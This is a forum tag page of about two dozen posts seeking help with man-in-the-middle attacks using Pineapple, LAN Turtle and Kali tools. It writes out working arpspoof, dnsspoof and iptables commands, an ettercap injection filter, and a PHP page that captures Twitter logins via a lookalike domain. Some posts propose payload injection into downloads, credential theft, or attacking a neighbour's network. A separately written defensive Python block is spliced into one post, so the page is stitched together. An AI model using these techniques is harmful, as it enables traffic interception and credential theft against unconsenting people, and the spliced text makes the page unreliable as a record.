Showing results for tags 'MiTM'.

  1. Hello, I've been attempting to redirect port 80 to port 8080 using iptables v1.8.3 to test an SSL strip MITM attack. I've entered the command:
     iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
     Upon entering it, it gives me the error: unknown option "--dport". It also doesn't recognize the "--to-port" option. I'm running Kali Linux on a Raspberry Pi 4B 4GB. Does anyone know how I can resolve this? I haven't found anything useful on the web after three days of troubleshooting. Cheers! -MichaelPV
  2. I have a payload idea for the Packet Squirrel. The idea is to use the Bash Bunny or the Rubber Ducky to install a certificate on a victim's computer, then deploy the Packet Squirrel to be able to decrypt all HTTPS traffic. I'm just wondering two things. First, does anybody know any decent MITM program that the Packet Squirrel can actually run? I have looked at bettercap, but it runs on Ruby, so I'm unsure if it will work with the Packet Squirrel. I have also looked a bit into mitmproxy, but I found the documentation vague. If it can't be run on the Packet Squirrel, maybe you could connect the Bash Bunny to it to perform the MITM attack.
  3. Hi, I have a WiFi Pineapple Nano which I recently purchased with the intention of testing the following. Scenario: smart devices and a smartphone within a home environment, with apps on the smartphone used to manage these devices, all connected to the GuestWiFi WLAN. I have a HomeWiFi WLAN to which I connected my laptop and other computing devices. Both WLANs use the same power line home extender service (TP-Link). I wish to: 1) use the Nano to sniff traffic on the GuestWiFi WLAN; 2) perform a MiTM by either creating a PineappleWiFi SSID and forcing all devices to connect to it, or by faking/spoofing the GuestWiFi. I updated the Nano to the latest firmware, 2.5.4, and have connected it to a MacBook Pro 2018 via USB (through a USB-C-to-USB adapter). The Nano also has a 32GB SD card so I can install modules on it. I assigned it on the Internet sharing interface and it is accessible (via the management portal in a browser and via SSH), and it can access the Internet (including resolving different websites). Recon works well, and I have put the smartphone and all connected devices in the allowed MACs part, and the GuestWiFi in the allowed SSID part, in the Filters section. My issue lies in being able to do 1) (I must be missing something here) and 2). Re (1), I enabled WiFi client mode to connect to GuestWiFi, but the problem is that it says enabling PineAP conflicts with wlan1. Is this a case of having to use GuestWiFi just in client mode (and not enabling PineAP) to satisfy (1)? In the case of (2), I enabled PineAP and have the Pineapple WiFi. Connecting the smartphone to it results in no Internet access (do I need to do IP forwarding?). Any help would be appreciated. Thanks and regards,
  4. What is the best way to protect me against MITM attacks under a public network?
  5. Hello, I bought a new WiFi Pineapple NANO and I've tried to install the Ettercap module, but I cannot run it, and there is no log to check what is going on. Is there any way to apply a MITM attack on a public network without forcing the clients to connect to my own evil AP? I want to spoof ARP and tcpdump all the traffic to the Nano's SD card. Thanks
  6. Hi, I don't post a lot on these forums, but I made a cool script that protects a Linux box from gateway ARP poisoning attacks (it does it instantly, without a 5 second poll delay like other scripts). All details are on the GitHub repo: https://github.com/Prodicode/ARPPD All feedback is appreciated! This was my first security project in C.
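     The detection idea behind a gateway ARP-poisoning guard, as an added illustration that is not code from the ARPPD repository or from the poster: pin the gateway's IP-to-MAC binding and flag any ARP reply that claims the gateway IP with a different hardware address. The frame parser below follows the standard Ethernet and ARP header layouts; the gateway address, MAC addresses and the sample frames are constructed test values, not taken from any real network.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# Standard Ethernet II and ARP header layouts (RFC 826), network byte order.
ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, ethertype
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


@dataclass
class ArpReply:
    sender_mac: str
    sender_ip: str


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_arp_reply(frame: bytes) -> Optional[ArpReply]:
    """Return the sender binding of an Ethernet/IPv4 ARP reply, or None for anything else."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _dst, _src, ethertype = ETH_HDR.unpack_from(frame)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _tha, _tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4) or op != ARP_REPLY:
        return None
    return ArpReply(mac_str(sha), ip_str(spa))


class GatewayGuard:
    """Holds the pinned gateway binding and reports replies that contradict it."""

    def __init__(self, gateway_ip: str, gateway_mac: str):
        self.gateway_ip = gateway_ip
        self.gateway_mac = gateway_mac.lower()

    def inspect(self, frame: bytes) -> Optional[str]:
        reply = parse_arp_reply(frame)
        if reply is None or reply.sender_ip != self.gateway_ip:
            return None          # not an ARP reply, or not about the gateway
        if reply.sender_mac != self.gateway_mac:
            return (f"ALERT: ARP reply claims gateway {self.gateway_ip} is at "
                    f"{reply.sender_mac}, pinned binding is {self.gateway_mac}")
        return None


def make_arp_reply(sender_mac: bytes, sender_ip: bytes, target_mac: bytes, target_ip: bytes) -> bytes:
    """Build a test frame (used only to construct sample input for the guard)."""
    eth = ETH_HDR.pack(target_mac, sender_mac, ETHERTYPE_ARP)
    arp = ARP_HDR.pack(1, 0x0800, 6, 4, ARP_REPLY, sender_mac, sender_ip, target_mac, target_ip)
    return eth + arp


# Constructed sample values (hypothetical LAN, not real addresses).
GW_IP = bytes([192, 168, 1, 1])
GW_MAC = bytes.fromhex("aabbccddeeff")
HOST_MAC = bytes.fromhex("112233445566")
HOST_IP = bytes([192, 168, 1, 50])
ROGUE_MAC = bytes.fromhex("0a0b0c0d0e0f")
OTHER_IP = bytes([192, 168, 1, 77])

SAMPLE_FRAMES = [
    make_arp_reply(GW_MAC, GW_IP, HOST_MAC, HOST_IP),        # legitimate gateway reply
    make_arp_reply(ROGUE_MAC, GW_IP, HOST_MAC, HOST_IP),     # someone else claiming the gateway IP
    make_arp_reply(ROGUE_MAC, OTHER_IP, HOST_MAC, HOST_IP),  # reply for an unrelated IP: ignored
    ETH_HDR.pack(HOST_MAC, GW_MAC, 0x0800) + b"\x45" + b"\x00" * 40,  # IPv4 frame: ignored
]


def run_demo() -> List[str]:
    guard = GatewayGuard("192.168.1.1", "aa:bb:cc:dd:ee:ff")
    alerts = [a for a in (guard.inspect(f) for f in SAMPLE_FRAMES) if a]
    for a in alerts:
        print(a)
    return alerts


if __name__ == "__main__":
    run_demo()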
  7. Hey guys, with April Fools coming up soon I want to try to make an nCage payload for the LAN Turtle. For the uninitiated, "nCage" is a Chrome extension that replaces every picture in the web browser with a picture of Nick Cage. I swear I saw somewhere that there was a payload for the LAN Turtle that replaced pictures in the browser with pictures of cats, so I figured I could modify that payload, but I couldn't find it. Is anyone familiar with a payload similar to that?
  8. OK, so I've set up the Nano with wp6 to share a connection with Kali; this all works spot on. Then I connect to the Nano with my phone; this is also fine. I fire up Wireshark but only see traffic directed from, is this correct? I presumed I would be seeing the IP given to my phone. Should the Internet connection be coming from the Nano or the laptop? What interface should I be sniffing? This is slightly baffling my brain, but I know it's so simple. Too much eggnog, I think. I know in a moment this will just click in my brain, as I feel I'm putting way too much thought into such a simple process. Thanks all
  9. Hey guys, I've run into a bit of trouble; could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's PHP if there is a path specified in the URL that isn't "index.php". Example landing page code below; var_dump($_POST) on line 12 returns an empty array despite the form sending the data:
     <?php
     if (!strstr($_SERVER['HTTP_HOST'], "twitter") && !strstr($_SERVER['HTTP_HOST'], "twimg")) {
         /* If not visiting twitter, redirect to non-HSTS twitter domain */
         die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">');
     } else {
         /* form posts to http://twitter.co.uk/sessions */
         if (strstr($_SERVER['REQUEST_URI'], "/sessions")) {
             /* var_dump($_POST) returns an empty array, should print login data */
             var_dump($_POST);
             die();
         }
         /* Curl the site */
         $curl = curl_init();
         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
         curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
         curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
         $result = curl_exec($curl);
         $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */
         $result = str_replace('<script', "<div style='display:none'><!--", $result);
         $result = str_replace('</script', "--></div", $result);
         echo $result;
     }
     ?>
     If I make the form post to http://twitter.co.uk directly, without the /sessions, they are accessible from the landing page, but I would really like to be able to access them even with other file paths.
  10. Hi everyone, I use the WiFi Pineapple as a man-in-the-middle device redirecting all traffic to a laptop that the WiFi Pineapple is tethered to, similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/ So here's my setup: a MacBook running a Linux VM (VirtualBox), connected via USB to the WiFi Pineapple, which is sending all traffic to the VirtualBox machine. Pardon my diagram skills :( Here is the script I have created based off of the post above. However, I don't think this is ideal, since you would need to SSH into the Pineapple to run this script every time. Ideally it would be best to do this via the web interface of the Pineapple via a simple "enable proxy" button etc. Any feedback would be appreciated.
      #!/bin/bash
      if [[ $# -eq 0 ]] ; then
          echo "Usage: $0 (enable|disable)"
          exit 1
      fi
      action="$1"
      case $action in
          enable)
              echo "Enabling ..."
              iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination
              #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination
              iptables -t nat -A POSTROUTING -j MASQUERADE
              ;;
          disable)
              echo "Disabling ..."
              iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination
              #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination
              # also undo the MASQUERADE rule that enable) added
              iptables -t nat -D POSTROUTING -j MASQUERADE
              ;;
          *)
              echo "Usage: $0 (enable|disable)"
              exit 1
              ;;
      esac
  11. Hello, I hope my video will help you understand how hackers can perform a man-in-the-middle attack and one of the tools they can use. Look what they can do with Xerosploit.
  12. (KST) Hi, I tested the SSH MITM by following this link. I have three PCs: attacker PC, SSH server and SSH client. After all the instructions were done, I connected via SSH to the server from the client. But when I do this, I cannot log in with a user from the server. I can only log in with the attacker's username and password and get logged in to the attacker PC. It means that the attacker PC does not redirect to the SSH server. But I have completed all the instructions described in that link. If you have time, please check my question and answer me.
  13. After using MITMf for a while on my Kali Linux machine, I'm wondering whether it would be feasible to use it on a Bash Bunny. You'd have to be able to pull things like the gateway and DNS server automatically, but beyond that the only problem I can think of is the complex dependencies for MITMf. Thoughts?
  14. I'm trying to perform a JavaScript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are from before 2016; I am not sure if this kind of attack still works now. Anyway, this is my filter script:
      if (ip.proto == TCP && tcp.dst == 80) {
          if (search(DATA.data, "Accept-Encoding")) {
              replace("Accept-Encoding", "Accept-Nothing!");
              msg("zapped Accept-Encoding!\n");
          }
      }
      if (ip.proto == TCP && tcp.dst == 80) {
          if (search(DATA.data, "<head>")) {
              replace("<head>", "<HEAD>");
              msg("Code injected");
          }
      }
      And I run it as
      ettercap -T -q -i wlan0 -F test.ef -M arp:remote / /
      test.ef is the compiled filter file. When the victim opens any web page, I get a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the HTML source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part,
      if (ip.proto == TCP && tcp.dst == 80) {
          replace("<head>", "<HEAD>");
          msg("Code injected");
      }
      the "Code injected" message shows, but the HTML code on the web client is not changed, which means the problem is that the filter cannot find any named strings (in this case <head>) in the HTML file; it can only deal with the header (Accept-Encoding). Does anyone know a solution or workaround? Please, any suggestions will be appreciated, thanks
  15. Hello Hak5 members, new to this site and platform, but I am pretty excited to be back in the States and to get my hands on the Tetra I purchased. When looking at modules, I can't seem to find something similar to the MITMf framework integrated into it. This makes use of FilePwn, but I have been having a great experience using Shellter. Where should I go for learning how to integrate a new module into the Pineapple? Here is what I am wanting:
      1. Client makes a request for a .exe file
      2. Pineapple forwards it to the web server
      3. Web server responds
      4. Pineapple receives the traffic:
         If (PARAMS == TRUE): pass the executable over to Shellter, inject a payload, then forward to the client.
         else: forward to the client
      Some of the params you would set up would be maximum file size (to make sure the process doesn't take too long), whether the program is already wrapped, etc. Ideally, one would be running some sort of HTTPS downgrade attack, or SSL Stripper, so the probability of injection is higher, as most sites now use HTTPS. Shellter has been awesome for me when it comes to AV evasion, but it may also be perfect to allow users to pipe the executable to whatever program they want to handle the payload injection and just have the module looking for the created file to pop up in a specific location.
  16. Hey all, the Tetra allows us to do so many great things. We can spoof the SSID and make a client think they are connecting to a "known" AP. The client has the WPA2 password stored to automatically connect to its "known" AP. Why can't we spoof the SSID (and MAC if necessary) but also prompt for a passkey (WEP/WPA/WPA2 depending on the legitimate AP) and sniff the passkey that the client sends? I have a feeling the issue has to do with the hashing done on each side of the 4-way handshake. It just seems like we should be able to MitM some of this. I appreciate anyone's input and teaching me like I'm 5. If the answer is something like "we do see all the hashes, which is why you then have to brute force/dictionary them to turn them to clear text", then why are we unable to "pass the hash" with WiFi?
  17. Hi guys! I recently became interested in deploying a MITM attack in my home network. I first used SSLsplit and ettercap from the Pineapple web interface (which is a little bit buggy sometimes). From there, the attack worked 1/3 of the time. Then I tried to do this from the CLI. ettercap seems to work pretty well (ettercap -Tqi wlan1 -M arp:remote // //), but I didn't manage to get SSLStrip working... And if I try to run SSLStrip from the GUI, the certs are signed by "SSLStrip", which causes security warnings. Is there a way to generate custom certs and pass them to the SSLStrip GUI? Thanks! PS: I observed that when the attack is going on, it's really slow to browse the Internet... Is that normal? Sorry for my bad English
  18. Hello, I have one question about the LAN Turtle. When I connect the LAN Turtle to a PC in a "big" network, the LAN Turtle has access to the network, doesn't it? When I want to start a MITM attack, does the target device only have to be in the same network, or should I connect the LAN Turtle directly to the targeted device? So for example, I plug the LAN Turtle into "PC206" and I want to attack "PC259"; does it work, or should I plug the Turtle into PC259? I hope you understand my question :) Thanks in advance, Simon PS: sorry for my bad English, I'm not a native speaker
  19. Hello, I was wondering what are the different techniques you guys use for a man in the middle attack. Just for something to learn and advance on. Thanks.
  20. Are there any possible ways of doing MITM attacks that would take usernames and passwords? When I try to use Xerosploit, PytheM, or even bettercap, none of these methods work on websites such as Facebook, Twitter, PayPal, Gmail, etc. Are there any new methods that are the latest and working right now?
  21. Hi, I did a pentest in a LAN, and some weird things happened. This LAN is a little unusual: there are two routers, say A and B. A is directly connected to an optical fiber, doing PPPoE, to the WAN; it has a gateway of , B is connected to A, a wireless router, with a gateway of . All the clients and my Kali machine are connected to B. The target has an IP of . Here is what I did with Kali. I used the following to ARP spoof the target and router B:
      arpspoof -i eth0 -t
      arpspoof -i eth0 -t
      sysctl -w net.ipv4.ip_forward=1
      Then I did a DNS spoof with
      dnsspoof -i eth0 -f dnshost.spoof
      It did not work; all the traffic went through my Kali, but the target was still able to access the original webpage. And here comes the weird thing. I stopped the dnsspoof, stopped the IP forwarding with
      sysctl -w net.ipv4.ip_forward=0
      and I started exactly the same dnsspoof as last time again, and it worked! This really confused me, because after that I tried to start arpspoof and dnsspoof without setting ip_forward to 1 at all; I left it at the default 0, and it did not work, because the ARP traffic was not working (which is expected!!). ArpSpoof and dnsspoof both work ONLY IF the process "IP forwarding is first enabled and then disabled" is completed once before launching dnsspoof. IP forwarding only on gives dnsspoof not working; IP forwarding always off gives arpspoof not working. Besides that, two more strange things I failed to understand. 1. Sometimes, the "IP forward on and off" cycle must be done in the same terminal where the dnsspoof takes place in order to make it work. Switching on then off in another terminal simply leads to arpspoof failure. 2. Here is the log/feedback of a dnsspoof:
      root@kali:~# dnsspoof -i eth0 -f dnshost.spoof
      dnsspoof: listening on eth0 [udp dst port 53 and not src]
      > 4678+ A? www.youtube.com
      > 4678+ A? www.youtube.com
      > 31827+ A? www.youtube.com
      > 31827+ A? www.youtube.com
      > 51608+ A? www.sina.com
      > 51608+ A? www.sina.com
      > 5651+ A? www.sina.com
      > 5651+ A? www.sina.com
      > 2950+ A? www.sina.com
      > 41196+ A? www.facebook.com
      > 41196+ A? www.facebook.com
      > 6912+ A? www.facebook.com
      > 6912+ A? www.facebook.com
      ^Croot@kali:~# dnsspoof -i eth0 -f dnshost.spoof
      dnsspoof: listening on eth0 [udp dst port 53 and not src]
      > 60485+ A? www.youtube.com
      > 60485+ A? www.youtube.com
      > 28894+ A? www.sina.com
      > 28894+ A? www.sina.com
      The second launch was a failed one; the first one succeeded. The router I am targeting should be router B; in the second launch, it is interacting only with router A. I am not sure what that means and if it has something to do with the failure directly, because in the next few attempts a feedback situation like this second launch worked sometimes. I am almost 100% sure this issue was due to the two routers, but I am still not able to understand why, or even find a way to make it always work. Please, any suggestion will be appreciated! Thanks
  22. Hey guys, I'm partially new here; I just wanted a little bit of help with a MiTM attack. Suppose I successfully cracked my neighbour's WiFi using the Evil Twin method and now I want to man-in-the-middle his smartphone or his whole network. Is it possible? My question here is that most of us nowadays use smartphone apps for Facebook, e-mail etc., and don't just go to the browser and then facebook.com, right? So is that possible? Thanks! :confused:
  23. I am completely and utterly disappointed. I have been searching for weeks to find out how to perform an ARP-poisoning MITM attack to sniff plain text credentials; the best thing I could find was Responder. There is no guide on how to use this explicitly on the WiFi Pineapple. I have basically paid $250 for a box. The last person to ask about this did not get anywhere in terms of help either. Please, can somebody in this entire forum show me how I can configure Responder to work on a wireless network, like from the ground level? What options do I select, do I connect in client mode (wlan1, wlan0), etc.? Please, this was a big investment for me.
  24. Hello wonderful people, so I'm hitting a snag with an attack I'm trying to carry out and could really use anyone's help trying to troubleshoot this. I've got the theory down and get halfway but can't seem to jump the last hurdle. So here's the gist: I'm trying to MitM devices connecting to my TETRA using Burp Suite to capture any HTTP or HTTPS traffic so that I can observe/modify (you know the drill) the HTTP/S traffic. The thing is, I can capture the traffic and MitM successfully with the TETRA (I am able to see all traffic passing through my attack machine within Wireshark). However, I can't seem to get that traffic into Burp. I'm only interested in sending HTTP/S traffic to Burp; all other traffic can head on out to the Internet. I've tried using iptables rules to preroute the traffic bound for dport 80 or 443 to the Burp proxy listening on 8080 (and tried individual listeners on 80 and 443 to no avail), but no traffic seems to get to it... well, to an extent. If I grab the HTTP header of google.com whilst routing traffic to Burp, I get an HTTP header for Burp itself. Here's a diagram because I like making them: the attacker's IP (Eth1) is , the Eth0 IP is (the LAN has Internet connectivity via the gateway at ). ETH0 and 1 are wired (I wire into the ETH port of my TETRA). Mobile devices are connecting via WiFi (PineAP). It's simple enough in my head: have all traffic coming in over ETH1 that is destined for 80 or 443 re-routed to the Burp listener... but it doesn't seem to work correctly. Here are the iptables rules I was creating to try and route the traffic (applied on the attacker's machine):
      iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to
      iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to
      And IP forwarding is enabled on the attacker's machine with:
      sysctl net.ipv4.ip_forward=1
      I'm still trying out stuff; the next thing is to route HTTP/S traffic from ETH1 to lo (seeing as the listener is on lo), but I know from previous posts there are legends on these forums and would appreciate some pokes in the right direction if anyone has any ideas. And yes, I did look around the forums and on the Internet, but I can't seem to find the thing that works. Any thoughts are welcome. I think this might be a cool addition to the forums if we can get it going. Thanks.
  25. Hey everyone, I am wondering if you guys have any specific steps you take once you are the MITM. What kind of things are you trying to do with the packets? Push Java applets to clients? Use Karmetasploit? Since SSLStrip is no longer working, what types of things are you doing to guarantee the most data out of your "victims"? I am particularly interested in emails, social media, etc., assuming it's been approved by the client I am auditing. I really want to show some examples of what can go wrong for a client site when a MITM attack is successfully executed using the Pineapple. Any ideas?